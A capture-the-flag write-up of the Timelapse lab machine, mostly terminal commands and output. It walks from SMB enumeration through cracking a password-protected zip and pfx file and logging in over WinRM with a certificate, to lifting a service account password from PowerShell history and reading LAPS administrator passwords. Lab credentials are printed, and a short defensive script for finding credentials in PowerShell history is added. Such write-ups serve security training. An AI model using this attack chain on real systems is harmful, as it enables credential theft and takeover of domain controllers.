1. Reconnaissance
1.1. nmap
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# nmap -sC -sV 10.129.227.113
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-20 14:28 +04
Nmap scan report for 10.129.227.113
Host is up (0.18s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-20 18:28:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-12-20T18:30:22+00:00; +7h59m59s from scanner time.
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-12-20T18:29:44
|_ start_date: N/A
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.99 seconds
1.2. Identifying shared folders with smbclient
The share list was enumerated with smbclient. Among the shares, the Shares folder stands out because it has no comment.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# smbclient -N -L //10.129.227.113
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.227.113 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
1.3. Failed reconnaissance
1.3.1. smbmap
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# smbmap -H 10.129.227.113
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.227.113, no fun for you...
[*] Closed 1 connections
1.3.2. rpcclient
An enumdomusers query was sent, but nothing could be listed because the null session has no permission.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# rpcclient -U "" -N 10.129.227.113
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> ^C
2. Initial foothold
2.1. Checking the winrm_backup.zip file
Inside the Shares folder there is a file named winrm_backup.zip. Given that backup files commonly contain credentials, this is likely to be useful.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# smbclient -N //10.129.227.113/Shares
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> ls
. D 0 Mon Oct 25 19:39:15 2021
.. D 0 Mon Oct 25 19:39:15 2021
Dev D 0 Mon Oct 25 23:40:06 2021
HelpDesk D 0 Mon Oct 25 19:48:42 2021
\Dev
. D 0 Mon Oct 25 23:40:06 2021
.. D 0 Mon Oct 25 23:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 19:46:42 2021
\HelpDesk
. D 0 Mon Oct 25 19:48:42 2021
.. D 0 Mon Oct 25 19:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 18:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 18:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 18:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 18:57:44 2021
6367231 blocks of size 4096. 1336360 blocks available
2.2. Extracting the archive
2.2.1. Failed extraction
Extracting the archive with unzip was attempted, but it failed: the archive is password protected.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
skipping: legacyy_dev_auth.pfx incorrect password
2.2.2. Extracting with john
Create a hash file from the archive with zip2john.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# zip2john winrm_backup.zip > winrm_backup.hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
Run john against the hash file. This recovers the password supremelegacy.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt winrm_backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2025-12-20 15:08) 8.333g/s 29491Kp/s 29491Kc/s 29491KC/s tabatha916..stefronc
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Extracting the archive with the recovered password yields the legacyy_dev_auth.pfx file.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
inflating: legacyy_dev_auth.pfx
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# ls
legacyy_dev_auth.pfx winrm_backup.hash winrm_backup.zip
2.3. Recovering the pfx password
2.3.1. What is a pfx file?
A pfx file is a PKCS#12 container that bundles a digital certificate and its private key into a single file. Keeping the certificate and private key separately is cumbersome, so they are packed together for storage and transfer. Therefore, after recovering the pfx password, the certificate (public key) and the private key will be split out and saved separately.
The reason for extracting them separately is that evil-winrm supports certificate-based login with a certificate and private key, so passing those two files will be used to obtain a shell.
2.3.2. Cracking the pfx file
Generate the hash with pfx2john.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.pfx.hash
Cracking it with john recovered the password thuglegacy.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 ASIMD 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:01 DONE (2025-12-20 15:19) 0.01633g/s 52855p/s 52855c/s 52855C/s thyriana..thomasfern
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
2.3.3. Extracting the private key
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
Enter pass phrase for legacyy_dev_auth.key-enc:
writing RSA key
2.3.4. Extracting the certificate (public key)
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Enter Import Password:
2.4. Connecting with evil-winrm using the certificate and private key
Authentication to evil-winrm with the certificate and private key works, as shown below.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# evil-winrm -i 10.129.227.113 -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> type ../Desktop/user.txt
3. Lateral Movement
3.1. Checking privileges
whoami /priv and whoami /groups were checked, but the account does not appear to hold any special privileges.
*Evil-WinRM* PS C:\Users\legacyy> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\legacyy> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Development Group S-1-5-21-671920749-559770252-3318990721-3101 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
*Evil-WinRM* PS C:\Users\legacyy>
3.2. Failed attempts
3.3. Checking PowerShell history
Just as bash history is checked on Linux, PowerShell history is checked on Windows. It is stored under the account's profile folder at \AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt.
Here, what appears to be the password of the svc_deploy account was obtained.
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
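The history above shows why credentials typed into an interactive session persist on disk. As an added defensive example (not part of this write-up), the Python script below scans ConsoleHost_history.txt-style lines for the credential idioms seen here (ConvertTo-SecureString -AsPlainText, a PSCredential with a literal user name) plus two common variants assumed for illustration (literal -Password/-p switches, net use with an inline password), reporting each hit with the secret redacted. The sample history and the svc_example / Example-Pa55w0rd! values are constructed.

```python
import re

# Each entry: (finding name, regex, capture group index, redact the captured value?).
# The first two idioms are the ones found in the history above; the other two are
# common variants added as assumptions for this example.
CREDENTIAL_PATTERNS = [
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(['\"])([^'\"]+)\1[^\n]*-AsPlainText", re.I), 2, True),
    ("PSCredential with literal user name",
     re.compile(r"PSCredential\s*\(\s*(['\"])([^'\"]+)\1", re.I), 2, False),
    ("literal -Password/-p switch",
     re.compile(r"(?:^|\s)(?:-Password|-p)\s+(['\"]?)([^\s'\"$][^\s'\"]*)\1", re.I), 2, True),
    ("net use with inline password",
     re.compile(r"^\s*net\s+use\s+\S+\s+(\S+)\s+/user:", re.I), 1, True),
]

def redact(value: str) -> str:
    """Keep the first two characters so a finding can be triaged without re-exposing it."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "*" * len(value)

def scan_history(lines):
    """Return (line number, finding name, reported value) for every suspicious line."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for name, pattern, group, sensitive in CREDENTIAL_PATTERNS:
            match = pattern.search(line)
            if match:
                value = match.group(group)
                findings.append((lineno, name, redact(value) if sensitive else value))
    return findings

# Constructed sample history (not the real file from the box); the secret is a dummy.
SAMPLE_HISTORY = r"""
whoami
$p = ConvertTo-SecureString 'Example-Pa55w0rd!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_example', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -scriptblock {whoami}
net use \\fileserver\share Example-Pa55w0rd! /user:CORP\svc_example
get-aduser -filter * -properties *
exit
""".strip().splitlines()

if __name__ == "__main__":
    for lineno, name, value in scan_history(SAMPLE_HISTORY):
        print(f"line {lineno}: {name}: {value}")
```

Running it over every profile's PSReadLine history (the path given above) is a quick way to find credentials that should be rotated and to justify turning off history saving for service accounts.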
3.3.1. Failed evil-winrm
Connecting with evil-winrm using the obtained credentials does not work at first. The reason is that this connection must use SSL: without -S, evil-winrm connects to port 5985 (HTTP); with -S, it connects to port 5986 (HTTPS), which is the only WinRM port the nmap scan showed open.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# evil-winrm -i 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired
Error: Exiting with code 1
3.3.2. Successful evil-winrm
With -S added, a shell is obtained normally.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# evil-winrm -i 10.129.227.113 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
4. Privilege escalation
4.1. Checking privileges
Now that the svc_deploy account is available, check its privileges first. No notable privileges are assigned to the account.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Checking group membership, LAPS_Readers stands out.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
4.2. What is LAPS_Readers?
LAPS stands for Local Administrator Password Solution; it manages the local administrator password of each domain-joined computer and stores it in Active Directory.
Since the account is in the Readers group, it can be inferred that it has the right to read those passwords.
4.3. Extracting the administrator password
The PowerShell command below retrieves the stored password for each computer. Among them, the following password for DC01 was obtained.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | Select-Object Name, ms-Mcs-AdmPwd
Name ms-Mcs-AdmPwd
---- -------------
DC01 fhbY1J#0+#)9N7y2{5k99E69
DB01
WEB01
DEV01
4.4. Logging in as administrator and obtaining the flag
Logging in with the administrator password obtained above succeeded.
┌──(root㉿kali)-[/home/kali/labs/Timelapse/Timelapse-2]
└─# evil-winrm -i 10.129.227.113 -u administrator -p 'fhbY1J#0+#)9N7y2{5k99E69' -S
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Notably, root.txt could not be found on the Administrator account's Desktop, so the flag is obtained from the TRX account's Desktop instead.
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
Cannot find path 'C:\Users\Administrator\Desktop\root.txt' because it does not exist.
At line:1 char:1
+ type ../Desktop/root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> cd TRX
*Evil-WinRM* PS C:\Users\TRX> type Desktop/root.txt